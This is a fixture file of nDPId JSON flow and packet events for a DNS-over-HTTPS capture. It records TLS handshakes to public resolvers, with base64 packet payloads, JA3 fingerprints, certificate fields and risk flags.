-00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} -01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} -00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 